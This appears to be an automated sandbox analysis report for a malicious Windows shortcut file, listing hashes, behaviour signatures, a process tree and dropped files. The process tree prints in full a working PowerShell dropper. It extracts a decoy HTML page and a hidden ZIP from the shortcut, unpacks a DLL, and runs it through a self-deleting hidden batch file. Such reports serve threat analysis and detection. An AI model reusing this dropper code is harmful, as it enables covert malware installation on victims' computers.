Analysis
-
max time kernel
273s -
max time network
320s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
11-10-2023 11:26
General
-
Target
050c65d45e5f21018aa940f0188c4aa1318ac3df865d901f8643ed7ce4a4b52c_JC.lnk
-
Size
4.4MB
-
MD5
45aca657889ac60f1ee129c5c8442cdb
-
SHA1
5db63aa4f87c6194d62b2e2e59c54bfcf9fbc9fc
-
SHA256
050c65d45e5f21018aa940f0188c4aa1318ac3df865d901f8643ed7ce4a4b52c
-
SHA512
0f76eb2f8685c9659805efefcf22e593f51622886415c1f238a479d2594a9ada13966ee0cd651adb7fb66a106f34e2c0deddc180207301263d1cc5caff7191ef
-
SSDEEP
98304:agHgGZPRjDjDN/v1gFXzz3WC9rW4IowsS7gpfCRhPhajd7H/:akPRj/DBNgF+CPIow57gIPIjdH/
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\050c65d45e5f21018aa940f0188c4aa1318ac3df865d901f8643ed7ce4a4b52c_JC.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell/W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472484} ^| Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472484} ^| Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00090300 -ReadCount 00090300;$pdfPath = \"$env:temp\securityMail_1031.html\"; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004386)) -Encoding Byte; ^& $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04662404 -ReadCount 04662404;$exePath=\"$env:public\11702.zip\";sc $exePath ([byte[]]($exeFile ^| select -Skip 00090300)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) ^| out-null; remove-item -path $exePath -force;$batPath=\"$env:public\27868.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00090300 -ReadCount 00090300;$pdfPath = \"$env:temp\securityMail_1031.html\"; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004386)) -Encoding Byte; & $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04662404 -ReadCount 04662404;$exePath=\"$env:public\11702.zip\";sc $exePath ([byte[]]($exeFile | select -Skip 00090300)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null; remove-item -path $exePath -force;$batPath=\"$env:public\27868.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\securityMail_1031.html4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1696 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD56fa39f31a4203fdbc1386fd781d3f776
SHA145cce783fcd0acd8d2662ab3d425aeedc4ee59b2
SHA256535f59a10378dd9de917eb1a08e641afcef534ceba4514333941125fb5abb035
SHA512051e8922bc4669d5835409d2fa3c15ea283c49ffb71c798d3b5d2fbe5c91e4a9312dc87eeb086286140f452e32c9e8a343f0f6fd967882ae10f90645bd9c88db
-
Filesize
344B
MD59d4d92dd129a59b409a27198ab36a3a4
SHA1e4844f33e8101a0a49ad8a994a93242e74968578
SHA2564dd77e795bad8973931ac3168777d394880c84663a64f8d29cd34abc2f8545cf
SHA512fbda652d02ba18c07a4dc7c6f627af73acd95144ad3c7adc481e1cb0fe4dff6e6595aeacdccb246421c36948c220a339f4e2dd1911836601dc0d6d2fbe647433
-
Filesize
344B
MD56d9a8b46dcc1c57106d17603618472e2
SHA175b3b4bfcceb1f249f6c90b7f41f9ff08630f4de
SHA25644c74abbcd836d1e45ea6075769f6e1c324be2ad3d29b64b51d99dc80a89da7b
SHA512244d806986de86fa1691fd5937aca4b0be2499d3a558a0bf6062cead6436729c4ab4dce94ca5aa18b2867d9a69f3bdf7ca910651b74e313ec00deb1e3e2a4d1d
-
Filesize
344B
MD565284e480c93e9e596796b6c0f2fe483
SHA1e322d75483a8151da91b3d3688bc40bae48b4b8d
SHA256089d5457069cce127f0ced52a3bb729e6ed491957e8ec85e5de15dcea165d4cc
SHA512d85819dacbc357ef8781ce19e12163efb6001e888aeee92be529ac42b955ccc5dbabe7288d8bdee00bd4264720dff1d9bea7f007c861fbb2f0b4c31a22abcd07
-
Filesize
344B
MD5db56e0655df538326bc2ba7afebb86c1
SHA1a3613ba80c879a0a65f5d9f889037f5c0df5d950
SHA256bc25fcaa90ee9b0afb97584f744d5e529f1e9628c8eea35b1e3342e6baec08aa
SHA5122e65d45f16841e0aacf338dc442ba26759b4b0bc6181fd3fc70167a0d19b4006dc52f4641cec3b3a0514b136e04c7dc6904d123d1ef3411fdf5d6216c517424d
-
Filesize
344B
MD53729859e50c239b495b7ef3c8f23147e
SHA1172ffd0153224da3e7c44bf242aa4715ea270e06
SHA256e66ba5e0b6cbf334a3726fb0362e4a67f0fef1af51a380e92e3c181dc8eebd25
SHA5125acc8fdfaca5552723c7740abf20bb3204a9b52c3b57aeecb5924b637713275eced0d2aeac72643ee49a3d978d669a2aacc7be1be1a16e7888057c0503c46247
-
Filesize
344B
MD5f0f1cb241cba3c3b3d34a1ad396ebe2d
SHA19c6c5aa4ead9ee0caf9a0da76e4e186f26b93524
SHA256332bfc5d799521e7d93db5c80038a74be5f819af9650ab253bdd3a266870baee
SHA5122a9fa62a90b760060d3ecf49ee7cd8840a6c729507bda0349f9a50ea80e1176df33e51638f07f3324ccd20a7a198c7599b4512b81717359facfbd4628f24e0eb
-
Filesize
344B
MD5f284996312e7828874b7d9238a068532
SHA1b60537b7cf515ec0d3abe153183fe03673c21c49
SHA256677f73da141ca607c04bf48cb5bbcb7aa03f9ceff7b4e5f0a64c955cf4ec0bb1
SHA51224d7ce42dcbc13a97a7cf48f45c0c807383b503bf9d9ef9371e01ab5b7280451bf1eb43fbb3008ebad11ba14262038256750cff71eb88edc095f4efd7ddf0054
-
Filesize
344B
MD5d91f9d225fa1e17892eed966a918dd2e
SHA15f278000d7d245d7e058cf0ae845b195402b5b43
SHA25678172015d7d122119098525861febce0e4078c43db4a1e3059cb6fc1baa18c77
SHA5121526f2cf522ef26c19f759be1276f0099f34d182ff0a237d074601b1bf4b34b1846680e436078c31192778c13d1f5d64b85a5a294cc51f0f5a07e7c7d4f44439
-
Filesize
344B
MD51cda65fe89f1cdaf9314d39a2f8b6136
SHA18fbf1b1c723f6bcc0818dac941c0e7d897fc6a70
SHA256e123c7fe2c8e41137863e6fed70f74639beb20f05ff139fbd73a46daa35ce912
SHA512e01a302eb3db228a3d7e5b69c20068b52512ded28777fd9e3b013d8b9a720e2828be09c13714d39e3ea49b511d49ee2e99c53cc7ec71d08e1dec03d14685069b
-
Filesize
344B
MD5564046cb0856bbff919cf7702d6817b5
SHA11147605b012c581eecb8f43221b06ca864db8cdd
SHA25665aa58bcd2e98b1e02f5d1dd7fe2b4fc68912f5da426aafb49a34d1b936fb6dc
SHA512c22cb172c430d3510f1a35d958d29eb69e8951a603b1a6eb0230a1d32a8b6113d6ad65918c75d9e480eb229adde3963e3aea9c4615dcc8435cbfe6069f8e8ee6
-
Filesize
344B
MD5890b979bb52252847cd8c09880853375
SHA16d5366dcec4b41c836316fae77deb689274894b5
SHA2568c84e9ccdca9a953a111b321fd0bcdfa6cbb284dd71b2a061b4a1a62ee86233f
SHA512c1b581a73ebc45a963a1fb64e1d9b90cdc4d04a58125fa5588a41ee590822570c5557213a3e39fb0e1af9a5ddeb1272c70c7c58b937327a115321b32b95942dd
-
Filesize
344B
MD55b99c4f3e5c70b9b42b9ece8f477a3c2
SHA1168690a1f3e3dc0bcfb42c2de79165ed704dc0f4
SHA256167b603f5b95b854aaedb4999450dc42997d9faaf3456ceea4c92fef299465ce
SHA5125d83e13d51f3cb8d1f91d3c2354ce8947119f91ebfbdefb2551bfe35487fc5301357d524204d438e628e459bf5e3fa175b0aece62f0046f9980a93b413535a9c
-
Filesize
344B
MD52b9a2790314b7c0bf3501416de2fc7dd
SHA1561f8ad21acecee254f681f4f5d353c786a9069e
SHA256ef5e2f7b4cb508eb0077a8e5f717cd797f1fe117796198ada05662897b58fcb8
SHA512249e278c484cc508b633f72438c542d7db73915d6ab18b079ba994ac16a7f393da17f4e06ee8bd6b73c4c6efdd03b3c65239da6d2fa34ac99cdafe9a6cffe8a5
-
Filesize
344B
MD5e3de887ae8c9e9f373a0c91ac5dfa8b4
SHA19f2721d0d7f2530861eb7952d8b95301f858a57b
SHA256fc73f314e2effff69abdce3df5cf20cc984d1bb7c620b669d85aff53ab2dde02
SHA51247812e187ad9035d3eb26a164499d8cc7d5720b8c1dbcf1bbff80956817c4c322775aaeb6160e7deedd7eb3274fa8d63d08c0287e7c888452b3add4902022e69
-
Filesize
344B
MD5168686da91b11ed86f9608d22496eaeb
SHA1052be728314bded884ce318f38398a24ab8a96af
SHA256da204785d1e342bfbf60979f6eb136ca285bfeae1a48ac44e76dc9ca6ba25f1f
SHA5120236af782db098abc59eb7cb31ab2944e2052cd0aa14464fb3c165f14df009bcc714420eac70445aec24e018d9b9a68d90f23106287318b80f566ce3c352265d
-
Filesize
344B
MD57e6c0bef378339c92d65513db5e11181
SHA1294185deb6656b10915d06d1220905d3183412ef
SHA25657d44445fb2b2cd324bf8ef1d76576ef7a4b77548f0da3669dde25b778ff35a6
SHA5127b54a94676391600b97cc804abf92c9a07313ce6d33446c582da712b2c4ffef50095ace7aa208ce3abbe122841f586ae86d3dc3c40b695fcebbe7ea72aac7379
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
Filesize
83KB
MD5fc3c5217ef57564abccd0d4f8a85bb44
SHA1cec296121f58458ed0f35ac50ef4031ae6217500
SHA256140ad719ab2c38d7086fc9dfb94e9867dd444ff3d904b10774f2751e3a6f57da
SHA5123163dbe846aa4d1c3cd81ea7510606968ee6d1e733b3100a0ca670744b547cacef7ec908f1fafd11bd3bf1a06a0148ca7d33924e4a11ffb5bd6e8d4a2e552b0c
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB